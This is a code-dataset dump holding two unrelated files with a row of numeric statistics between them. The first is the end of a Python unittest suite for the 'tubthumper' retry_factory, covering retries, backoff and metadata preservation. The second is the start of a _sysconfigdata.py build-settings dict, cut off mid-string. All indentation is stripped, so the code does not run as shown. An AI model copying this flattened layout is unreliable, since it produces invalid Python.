self.assertEqual(func.await_count, 2)
func.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
async def test_staticmethod_of_object(self):
"""Test retry and correct call structure for wrapping a object's async staticmethod"""
class _Class:
method = staticmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
async def test_staticmethod_of_class(self):
"""Test retry and correct call structure for wrapping a class's async staticmethod"""
class _Class:
method = staticmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
class TestRetryFactory(unittest.TestCase):
"""Test case for retry factory"""
def test_success(self):
"""Test success of a simple function decorated with retry_decorator"""
return_value = 1
func = Mock(return_value=return_value)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
result = wrapped_func()
self.assertEqual(result, return_value)
func.assert_called_once_with()
def test_only_keyword_args(self):
"""Test that the retry decorator only allows keyword arguments"""
func = Mock()
with self.assertRaises(TypeError):
retry_factory( # pylint: disable=missing-kwoa,too-many-function-args
func,
constants.TestException,
)
@staticmethod
def test_func_call():
"""Test function is called with appropriate arguments"""
func = Mock()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
wrapped_func(*constants.ARGS, **constants.KWARGS)
func.assert_called_once_with(*constants.ARGS, **constants.KWARGS)
def test_single_exception(self):
"""Test providing a single exception to catch is caught and retried"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_diff_single_exception(self):
"""Test providing a single exception and throwing a different one is not caught and retried"""
side_effect = TypeError
func = Mock(side_effect=side_effect)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
with self.assertRaises(side_effect):
wrapped_func()
func.assert_called_once_with()
def test_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing one of them is caught and retried"""
exceptions = (constants.TestException, TypeError)
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=exceptions,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_diff_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing a different one is not caught and retried"""
exceptions = (ValueError, TypeError)
side_effect = constants.TestException
func = Mock(side_effect=side_effect)
wrapped_func = retry_factory(func, exceptions=exceptions)
with self.assertRaises(constants.TestException):
wrapped_func()
func.assert_called_once_with()
def test_reraise(self):
"""Test that setting reraise to True results in raising the caught exception, not RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
reraise=True,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(constants.TestException):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_reraise_with_time_limit(self):
"""Test that setting reraise to True with a time limit results in raising the caught exception, not RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
time_limit=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
wrapped_func()
self.assertEqual(func.call_count, 1)
def test_retry_limit_0(self):
"""Test retry_limit set to 0 calls function once and raises RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=0
)
with self.assertRaises(RetryError):
wrapped_func()
func.assert_called_once_with()
def test_time_limit(self):
"""Test that setting a time_limit results in a RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, time_limit=0
)
with self.assertRaises(RetryError):
wrapped_func()
func.assert_called_once_with()
def test_jitter(self):
"""Test jitter results in random variation in backoff time, predictable thanks to setting the random seed"""
func = util.timed_mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1
)
random.seed(constants.RANDOM_SEED)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, constants.RANDOM_QUANTITY)
def test_init_backoff(self):
"""Test init_backoff results in appropriate backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
retry_limit=1,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, init_backoff)
def test_exponential_backoff(self):
"""Test default exponential backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
retry_limit=2,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], 2 * init_backoff
)
def test_custom_exponential_backoff(self):
"""Test custom exponential backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
exponential = 1.5
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
exponential=exponential,
retry_limit=2,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], exponential * init_backoff
)
def test_logging(self):
"""Test retrying results in a warning log statement"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=tubthumper_logger, level=logging.WARNING):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_custom_logging_level(self):
"""Test that setting a custom log level works"""
func = Mock(side_effect=constants.TestException)
level = logging.INFO
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
log_level=level,
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=tubthumper_logger, level=level):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_custom_logger(self):
"""Test that supplying a custom logger works"""
func = Mock(side_effect=constants.TestException)
logger = logging.getLogger(__name__)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=logger, level=logging.WARNING):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_method_of_object(self):
"""Test retry and correct call structure for decorating an object's method"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(obj, *constants.ARGS, **constants.KWARGS)
def test_method_of_class(self):
"""Test retry and correct call structure for decorating a class's method"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_classmethod_of_object(self):
"""Test retry and correct call structure for decorating an object's classmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = classmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
def test_classmethod_of_class(self):
"""Test retry and correct call structure for decorating a class's classmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = classmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
def test_staticmethod_of_object(self):
"""Test retry and correct call structure for decorating a object's staticmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = staticmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_staticmethod_of_class(self):
"""Test retry and correct call structure for decorating a class's staticmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = staticmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_function_signature(self):
"""Test that the decorated function has the same signature as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_sig = inspect.signature(func)
dec_func_sig = inspect.signature(wrapped_func)
self.assertEqual(func_sig, dec_func_sig)
def test_function_name(self):
"""Test that the decorated function has the same __name__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_name = func.__name__
dec_func_name = wrapped_func.__name__
self.assertEqual(func_name, dec_func_name)
def test_function_qualname(self):
"""Test that the decorated function has the same __qualname__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_qualname = func.__qualname__
dec_func_qualname = wrapped_func.__qualname__
self.assertEqual(func_qualname, dec_func_qualname)
def test_function_module(self):
"""Test that the decorated function has the same __module__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_module = func.__module__
dec_func_module = wrapped_func.__module__
self.assertEqual(func_module, dec_func_module)
def test_function_docstr(self):
"""Test that the decorated function has the same __doc__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_docstr = func.__doc__
dec_func_docstr = wrapped_func.__doc__
self.assertEqual(func_docstr, dec_func_docstr)
def test_function_annotations(self):
"""Test that the decorated function has the same __annotations__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_annotations = func.__annotations__
dec_func_annotations = wrapped_func.__annotations__
self.assertEqual(func_annotations, dec_func_annotations)
def test_function_attrs(self):
"""Test that the decorated function has the same attributes as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
for key in func.__dict__:
func_val = getattr(func, key)
dec_func_val = getattr(wrapped_func, key)
self.assertEqual(func_val, dec_func_val)
def test_isfunction(self):
"""Test the the decorated function is recognized as a function"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
self.assertTrue(inspect.isfunction(wrapped_func))
def test_isroutine(self):
"""Test the the decorated function is recognized as a routine"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
self.assertTrue(inspect.isroutine(wrapped_func))
def test_ismethod(self):
"""Test the the decorated function is recognized as a method"""
func = util.get_a_func()
class _Class:
method = retry_factory(func, exceptions=constants.TestException)
obj = _Class()
self.assertTrue(inspect.ismethod(obj.method))
def test_iscoroutinefunction(self):
"""Test the the decorated function is recognized as a coroutine function"""
async_func = util.get_an_async_func()
wrapped_func = retry_factory(async_func, exceptions=constants.TestException)
self.assertTrue(inspect.iscoroutinefunction(wrapped_func))
def test_repr(self):
"""Test that the decorated function has the proper repr"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
dec_func_repr = repr(wrapped_func)
self.assertRegex(dec_func_repr, constants.REPR_REGEX)
if __name__ == "__main__":
unittest.main()
| 39.639303
| 121
| 0.64647
| 3,508
| 31,870
| 5.632269
| 0.053022
| 0.114688
| 0.090697
| 0.059368
| 0.900445
| 0.877771
| 0.866231
| 0.845379
| 0.82478
| 0.796589
| 0
| 0.006553
| 0.272231
| 31,870
| 803
| 122
| 39.688668
| 0.845305
| 0.084405
| 0
| 0.71118
| 0
| 0
| 0.00066
| 0
| 0
| 0
| 0
| 0
| 0.206522
| 1
| 0.055901
| false
| 0
| 0.01087
| 0
| 0.090062
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c82334ebc12ece6182b0d1b624c95925f4846b2
| 18,167
|
py
|
Python
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 5,926
|
2015-01-01T07:45:08.000Z
|
2022-03-31T12:34:38.000Z
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 1,728
|
2015-01-01T01:09:12.000Z
|
2022-03-30T23:25:22.000Z
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 574
|
2015-01-02T01:36:10.000Z
|
2022-03-26T10:18:48.000Z
|
build_time_vars={'HAVE_SYS_WAIT_H': 1, 'HAVE_UTIL_H': 0, 'HAVE_SYMLINKAT': 1, 'HAVE_LIBSENDFILE': 0, 'SRCDIRS': 'Parser Grammar Objects Python Modules Mac', 'SIZEOF_OFF_T': 8, 'BASECFLAGS': '-Wno-unused-result', 'HAVE_UTIME_H': 1, 'EXTRAMACHDEPPATH': '', 'HAVE_SYS_TIME_H': 1, 'CFLAGSFORSHARED': '-fPIC', 'HAVE_HYPOT': 1, 'PGSRCS': '\\', 'HAVE_LIBUTIL_H': 0, 'HAVE_COMPUTED_GOTOS': 1, 'HAVE_LUTIMES': 1, 'HAVE_MAKEDEV': 1, 'HAVE_REALPATH': 1, 'HAVE_LINUX_TIPC_H': 1, 'MULTIARCH': 'i386-linux-gnu', 'HAVE_GETWD': 1, 'HAVE_GCC_ASM_FOR_X64': 0, 'HAVE_INET_PTON': 1, 'HAVE_GETHOSTBYNAME_R_6_ARG': 1, 'SIZEOF__BOOL': 1, 'HAVE_ZLIB_COPY': 1, 'ASDLGEN': 'python3.3 ../Parser/asdl_c.py', 'GRAMMAR_INPUT': '../Grammar/Grammar', 'HOST_GNU_TYPE': 'i686-pc-linux-gnu', 'HAVE_SCHED_RR_GET_INTERVAL': 1, 'HAVE_BLUETOOTH_H': 0, 'HAVE_MKFIFO': 1, 'TIMEMODULE_LIB': 0, 'LIBM': '-lm', 'PGENOBJS': '\\ \\', 'PYTHONFRAMEWORK': '', 'GETPGRP_HAVE_ARG': 0, 'HAVE_MMAP': 1, 'SHLIB_SUFFIX': '.so', 'SIZEOF_FLOAT': 4, 'HAVE_RENAMEAT': 1, 'HAVE_LANGINFO_H': 1, 'HAVE_STDLIB_H': 1, 'PY_CORE_CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -I. -IInclude -I../Include -D_FORTIFY_SOURCE=2 -fPIC -DPy_BUILD_CORE', 'HAVE_BROKEN_PIPE_BUF': 0, 'HAVE_CONFSTR': 1, 'HAVE_SIGTIMEDWAIT': 1, 'HAVE_FTELLO': 1, 'READELF': 'readelf', 'HAVE_SIGALTSTACK': 1, 'TESTTIMEOUT': 3600, 'PYTHONPATH': ':plat-i386-linux-gnu', 'SIZEOF_WCHAR_T': 4, 'LIBOBJS': '', 'HAVE_SYSCONF': 1, 'MAKESETUP': '../Modules/makesetup', 'HAVE_UTIMENSAT': 1, 'HAVE_FCHOWNAT': 1, 'HAVE_WORKING_TZSET': 1, 'HAVE_FINITE': 1, 'HAVE_ASINH': 1, 'HAVE_SETEUID': 1, 'CONFIGFILES': 'configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in', 'HAVE_SETGROUPS': 1, 'PARSER_OBJS': '\\ Parser/myreadline.o Parser/parsetok.o Parser/tokenizer.o', 'HAVE_MBRTOWC': 1, 'SIZEOF_INT': 4, 'HAVE_STDARG_PROTOTYPES': 1, 'TM_IN_SYS_TIME': 0, 'HAVE_SYS_TIMES_H': 1, 'HAVE_LCHOWN': 1, 'HAVE_SSIZE_T': 1, 'HAVE_PAUSE': 1, 'SYSLIBS': '-lm', 'POSIX_SEMAPHORES_NOT_ENABLED': 0, 'HAVE_DEVICE_MACROS': 1, 'BLDSHARED': 'i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -Wl,-Bsymbolic-functions -Wl,-z,relro -Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'LIBSUBDIRS': 'tkinter tkinter/test tkinter/test/test_tkinter \\', 'HAVE_SYS_UN_H': 1, 'HAVE_SYS_STAT_H': 1, 'VPATH': '..', 'INCLDIRSTOMAKE': '/usr/include /usr/include /usr/include/python3.3m /usr/include/python3.3m', 'HAVE_BROKEN_SEM_GETVALUE': 0, 'HAVE_TIMEGM': 1, 'PACKAGE_VERSION': 0, 'MAJOR_IN_SYSMACROS': 0, 'HAVE_ATANH': 1, 'HAVE_GAI_STRERROR': 1, 'HAVE_SYS_POLL_H': 1, 'SIZEOF_PTHREAD_T': 4, 'SIZEOF_FPOS_T': 16, 'HAVE_CTERMID': 1, 'HAVE_TMPFILE': 1, 'HAVE_SETUID': 1, 'CXX': 'i686-linux-gnu-g++ -pthread', 'srcdir': '..', 'HAVE_UINT32_T': 1, 'HAVE_ADDRINFO': 1, 'HAVE_GETSPENT': 1, 'SIZEOF_DOUBLE': 8, 'HAVE_INT32_T': 1, 'LIBRARY_OBJS_OMIT_FROZEN': '\\', 'HAVE_FUTIMES': 1, 'CONFINCLUDEPY': '/usr/include/python3.3m', 'HAVE_RL_COMPLETION_APPEND_CHARACTER': 1, 'LIBFFI_INCLUDEDIR': '', 'HAVE_SETGID': 1, 'HAVE_UINT64_T': 1, 'EXEMODE': 755, 'UNIVERSALSDK': '', 'HAVE_LIBDL': 1, 'HAVE_GETNAMEINFO': 1, 'HAVE_STDINT_H': 1, 'COREPYTHONPATH': ':plat-i386-linux-gnu', 'HAVE_SOCKADDR_STORAGE': 1, 'HAVE_WAITID': 1, 'EXTRAPLATDIR': '@EXTRAPLATDIR@', 'HAVE_ACCEPT4': 1, 'RUNSHARED': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared:', 'EXE': '', 'HAVE_SIGACTION': 1, 'HAVE_CHOWN': 1, 'HAVE_GETLOGIN': 1, 'HAVE_TZNAME': 0, 'PACKAGE_NAME': 0, 'HAVE_GETPGID': 1, 'HAVE_GLIBC_MEMMOVE_BUG': 0, 'BUILD_GNU_TYPE': 'i686-pc-linux-gnu', 'HAVE_LINUX_CAN_H': 1, 'DYNLOADFILE': 'dynload_shlib.o', 'HAVE_PWRITE': 1, 'BUILDEXE': '', 'HAVE_OPENPTY': 1, 'HAVE_LOCKF': 1, 'HAVE_COPYSIGN': 1, 'HAVE_PREAD': 1, 'HAVE_DLOPEN': 1, 'HAVE_SYS_KERN_CONTROL_H': 0, 'PY_FORMAT_LONG_LONG': '"ll"', 'HAVE_TCSETPGRP': 1, 'HAVE_SETSID': 1, 'HAVE_STRUCT_STAT_ST_BIRTHTIME': 0, 'HAVE_STRING_H': 1, 'LDLIBRARY': 'libpython3.3m.so', 'INSTALL_SCRIPT': '/usr/bin/install -c', 'HAVE_SYS_XATTR_H': 1, 'HAVE_CURSES_IS_TERM_RESIZED': 1, 'HAVE_TMPNAM_R': 1, 'STRICT_SYSV_CURSES': "/* Don't use ncurses extensions */", 'WANT_SIGFPE_HANDLER': 1, 'HAVE_INT64_T': 1, 'HAVE_STAT_TV_NSEC': 1, 'HAVE_SYS_MKDEV_H': 0, 'HAVE_BROKEN_POLL': 0, 'HAVE_IF_NAMEINDEX': 1, 'HAVE_GETPWENT': 1, 'PSRCS': '\\', 'RANLIB': 'ranlib', 'HAVE_WCSCOLL': 1, 'WITH_NEXT_FRAMEWORK': 0, 'ASDLGEN_FILES': '../Parser/asdl.py ../Parser/asdl_c.py', 'HAVE_RL_PRE_INPUT_HOOK': 1, 'PACKAGE_URL': 0, 'SHLIB_EXT': 0, 'HAVE_SYS_LOADAVG_H': 0, 'HAVE_LIBIEEE': 0, 'HAVE_SEM_OPEN': 1, 'HAVE_TERM_H': 1, 'IO_OBJS': '\\', 'IO_H': 'Modules/_io/_iomodule.h', 'HAVE_STATVFS': 1, 'VERSION': '3.3', 'HAVE_GETC_UNLOCKED': 1, 'MACHDEPS': 'plat-i386-linux-gnu @EXTRAPLATDIR@', 'SUBDIRSTOO': 'Include Lib Misc', 'HAVE_SETREUID': 1, 'HAVE_ERFC': 1, 'HAVE_SETRESUID': 1, 'LINKFORSHARED': '-Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions', 'HAVE_SYS_TYPES_H': 1, 'HAVE_GETPAGESIZE': 1, 'HAVE_SETEGID': 1, 'HAVE_PTY_H': 1, 'HAVE_STRUCT_STAT_ST_FLAGS': 0, 'HAVE_WCHAR_H': 1, 'HAVE_FSEEKO': 1, 'Py_ENABLE_SHARED': 1, 'HAVE_SIGRELSE': 1, 'HAVE_PTHREAD_INIT': 0, 'FILEMODE': 644, 'HAVE_SYS_RESOURCE_H': 1, 'HAVE_READLINKAT': 1, 'PYLONG_BITS_IN_DIGIT': 0, 'LINKCC': 'i686-linux-gnu-gcc -pthread', 'HAVE_SETLOCALE': 1, 'HAVE_CHROOT': 1, 'HAVE_OPENAT': 1, 'HAVE_FEXECVE': 1, 'LDCXXSHARED': 'i686-linux-gnu-g++ -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions', 'DIST': 'README ChangeLog configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in Include Lib Misc Ext-dummy', 'HAVE_MKNOD': 1, 'PY_LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'HAVE_BROKEN_MBSTOWCS': 0, 'LIBRARY_OBJS': '\\', 'HAVE_LOG1P': 1, 'SIZEOF_VOID_P': 4, 'HAVE_FCHOWN': 1, 'PYTHONFRAMEWORKPREFIX': '', 'HAVE_LIBDLD': 0, 'HAVE_TGAMMA': 1, 'HAVE_ERRNO_H': 1, 'HAVE_IO_H': 0, 'OTHER_LIBTOOL_OPT': '', 'HAVE_POLL_H': 1, 'PY_CPPFLAGS': '-I. -IInclude -I../Include -D_FORTIFY_SOURCE=2', 'XMLLIBSUBDIRS': 'xml xml/dom xml/etree xml/parsers xml/sax', 'GRAMMAR_H': 'Include/graminit.h', 'TANH_PRESERVES_ZERO_SIGN': 1, 'HAVE_GETLOADAVG': 1, 'UNICODE_DEPS': '\\ \\', 'HAVE_GETCWD': 1, 'MANDIR': '/usr/share/man', 'MACHDESTLIB': '/usr/lib/python3.3', 'GRAMMAR_C': 'Python/graminit.c', 'PGOBJS': '\\', 'HAVE_DEV_PTMX': 1, 'HAVE_UINTPTR_T': 1, 'HAVE_SCHED_SETAFFINITY': 1, 'PURIFY': '', 'HAVE_DECL_ISINF': 1, 'HAVE_RL_CALLBACK': 1, 'HAVE_WRITEV': 1, 'HAVE_GETHOSTBYNAME_R_5_ARG': 0, 'HAVE_SYS_AUDIOIO_H': 0, 'EXT_SUFFIX': '.cpython-33m.so', 'SIZEOF_LONG_LONG': 8, 'DLINCLDIR': '.', 'HAVE_PATHCONF': 1, 'HAVE_UNLINKAT': 1, 'MKDIR_P': '/bin/mkdir -p', 'HAVE_ALTZONE': 0, 'SCRIPTDIR': '/usr/lib', 'OPCODETARGETGEN_FILES': '\\', 'HAVE_GETSPNAM': 1, 'HAVE_SYS_TERMIO_H': 0, 'HAVE_ATTRIBUTE_FORMAT_PARSETUPLE': 0, 'HAVE_PTHREAD_H': 1, 'Py_DEBUG': 0, 'HAVE_STRUCT_STAT_ST_BLOCKS': 1, 'X87_DOUBLE_ROUNDING': 1, 'SIZEOF_TIME_T': 4, 'HAVE_DYNAMIC_LOADING': 1, 'HAVE_DIRECT_H': 0, 'SRC_GDB_HOOKS': '../Tools/gdb/libpython.py', 'HAVE_GETADDRINFO': 1, 'HAVE_BROKEN_NICE': 0, 'HAVE_DIRENT_H': 1, 'HAVE_WCSXFRM': 1, 'HAVE_RL_COMPLETION_DISPLAY_MATCHES_HOOK': 1, 'HAVE_FSTATVFS': 1, 'PYTHON': 'python', 'HAVE_OSX105_SDK': 0, 'BINDIR': '/usr/bin', 'TESTPYTHON': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared: ./python', 'ARFLAGS': 'rc', 'PLATDIR': 'plat-i386-linux-gnu', 'HAVE_ASM_TYPES_H': 1, 'PY3LIBRARY': 'libpython3.so', 'HAVE_PLOCK': 0, 'FLOCK_NEEDS_LIBBSD': 0, 'WITH_TSC': 0, 'HAVE_LIBREADLINE': 1, 'MACHDEP': 'linux', 'HAVE_SELECT': 1, 'LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'HAVE_HSTRERROR': 1, 'SOABI': 'cpython-33m', 'HAVE_GETTIMEOFDAY': 1, 'HAVE_LIBRESOLV': 0, 'HAVE_UNSETENV': 1, 'HAVE_TM_ZONE': 1, 'HAVE_GETPGRP': 1, 'HAVE_FLOCK': 1, 'HAVE_SYS_BSDTTY_H': 0, 'SUBDIRS': '', 'PYTHONFRAMEWORKINSTALLDIR': '', 'PACKAGE_BUGREPORT': 0, 'HAVE_CLOCK': 1, 'HAVE_GETPEERNAME': 1, 'SIZEOF_PID_T': 4, 'HAVE_CONIO_H': 0, 'HAVE_FSTATAT': 1, 'HAVE_NETPACKET_PACKET_H': 1, 'HAVE_WAIT3': 1, 'DESTPATH': '', 'HAVE_STAT_TV_NSEC2': 0, 'HAVE_GETRESGID': 1, 'HAVE_UCS4_TCL': 0, 'SIGNED_RIGHT_SHIFT_ZERO_FILLS': 0, 'HAVE_TIMES': 1, 'HAVE_UNAME': 1, 'HAVE_ERF': 1, 'SIZEOF_SHORT': 2, 'HAVE_NCURSES_H': 1, 'HAVE_SYS_SENDFILE_H': 1, 'HAVE_CTERMID_R': 0, 'HAVE_TMPNAM': 1, 'prefix': '/usr', 'HAVE_NICE': 1, 'WITH_THREAD': 1, 'LN': 'ln', 'TESTRUNNER': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared: ./python ../Tools/scripts/run_tests.py', 'HAVE_SIGINTERRUPT': 1, 'HAVE_SETPGID': 1, 'RETSIGTYPE': 'void', 'HAVE_SCHED_GET_PRIORITY_MAX': 1, 'HAVE_SYS_SYS_DOMAIN_H': 0, 'HAVE_SYS_DIR_H': 0, 'HAVE__GETPTY': 0, 'HAVE_BLUETOOTH_BLUETOOTH_H': 1, 'HAVE_BIND_TEXTDOMAIN_CODESET': 1, 'HAVE_POLL': 1, 'PYTHON_OBJS': '\\', 'HAVE_WAITPID': 1, 'USE_INLINE': 1, 'HAVE_FUTIMENS': 1, 'USE_COMPUTED_GOTOS': 1, 'MAINCC': 'i686-linux-gnu-gcc -pthread', 'HAVE_SOCKETPAIR': 1, 'HAVE_PROCESS_H': 0, 'HAVE_SETVBUF': 1, 'HAVE_FDOPENDIR': 1, 'CONFINCLUDEDIR': '/usr/include', 'BINLIBDEST': '/usr/lib/python3.3', 'HAVE_SYS_IOCTL_H': 1, 'HAVE_SYSEXITS_H': 1, 'LDLAST': '', 'HAVE_SYS_FILE_H': 1, 'HAVE_RL_COMPLETION_SUPPRESS_APPEND': 1, 'HAVE_RL_COMPLETION_MATCHES': 1, 'HAVE_TCGETPGRP': 1, 'SIZEOF_SIZE_T': 4, 'HAVE_EPOLL_CREATE1': 1, 'HAVE_SYS_SELECT_H': 1, 'HAVE_CLOCK_GETTIME': 1, 'CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'HAVE_SNPRINTF': 1, 'BLDLIBRARY': '-lpython3.3m', 'PARSER_HEADERS': '\\', 'SO': '.so', 'LIBRARY': 'libpython3.3m.a', 'HAVE_FPATHCONF': 1, 'HAVE_TERMIOS_H': 1, 'HAVE_BROKEN_PTHREAD_SIGMASK': 0, 'AST_H': 'Include/Python-ast.h', 'HAVE_GCC_UINT128_T': 0, 'HAVE_ACOSH': 1, 'MODOBJS': 'Modules/_threadmodule.o Modules/signalmodule.o 